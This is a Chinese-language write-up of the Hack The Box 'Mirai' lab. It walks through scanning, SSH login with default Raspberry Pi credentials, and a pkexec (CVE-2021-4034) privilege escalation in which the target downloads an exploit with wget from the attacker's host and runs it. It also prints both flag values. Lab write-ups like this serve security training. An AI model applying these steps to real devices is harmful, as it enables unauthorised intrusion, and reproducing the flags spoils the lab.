hack the box之mirai靶场练习
字数 963 2025-08-11 08:35:50
Mirai靶场渗透测试教学文档
靶场概述
Mirai是Hack The Box平台上的一个Linux靶机,难度评级为"简单"。该靶机模拟了一个树莓派设备,通过利用默认凭证和已知漏洞可以完成渗透测试。
信息收集
初始扫描
使用Nmap进行端口扫描:
nmap -sV -p- <靶机IP>
发现开放端口:
- 22/tcp - SSH服务
- 53/tcp - DNS服务
- 80/tcp - HTTP服务
目录扫描
使用工具如dirsearch或gobuster扫描Web目录:
gobuster dir -u http://<靶机IP> -w /path/to/wordlist.txt
发现重要目录:
- /admin/ - 树莓派后台管理页面
- /versions/ - 下载一个包含时间戳的version文件
初始访问
凭证尝试
树莓派设备常见的默认凭证:
- 用户名:pi
- 密码:raspberry
尝试在以下位置使用这些凭证:
- Web管理界面登录失败
- SSH服务登录成功:
ssh pi@<靶机IP>
权限提升
信息收集
登录后检查当前用户权限:
id
whoami
查找具有SUID权限的可执行文件:
find / -perm -4000 -type f 2>/dev/null
发现pkexec具有SUID权限,检查其版本:
pkexec --version
漏洞利用
确认pkexec版本存在提权漏洞(如CVE-2021-4034)。利用步骤:
- 在攻击机(Kali)上准备漏洞利用脚本
- 在攻击机上启动HTTP服务:
python3 -m http.server 80
- 在目标机器上下载利用脚本:
wget http://<攻击机IP>/exploit.tar.gz
- 解压并执行:
tar xvf exploit.tar.gz
cd exploit_directory
chmod +x exploit
./exploit
成功获取root权限。
获取Flag
User Flag
查找user.txt:
find / -name user.txt 2>/dev/null
获取内容:ff837707441b257a20e32199d7c8838d
Root Flag
root.txt文件损坏,但提示备份在USB闪存中:
- 检查挂载点:
mount | grep usb
- 检查/dev目录:
ls -la /dev/sd*
- 直接读取/dev/sdb设备:
strings /dev/sdb | grep -i flag
获取疑似flag:3d3e483143ff12ec505d026fa13e020b
总结与经验
- 默认凭证:IoT设备常使用默认凭证,应尝试常见组合
- 多服务测试:同一凭证可能在多个服务中通用
- 文件恢复:当文件损坏时,检查挂载设备和备份位置
- SUID提权:定期检查具有SUID权限的文件,特别是已知漏洞的版本
扩展知识
- 树莓派安全:树莓派设备常因默认配置和弱密码成为攻击目标
- pkexec漏洞:CVE-2021-4034是Polkit的权限提升漏洞,影响多个Linux发行版
- USB设备取证:Linux中USB设备通常挂载在/dev/sd*,可直接读取原始数据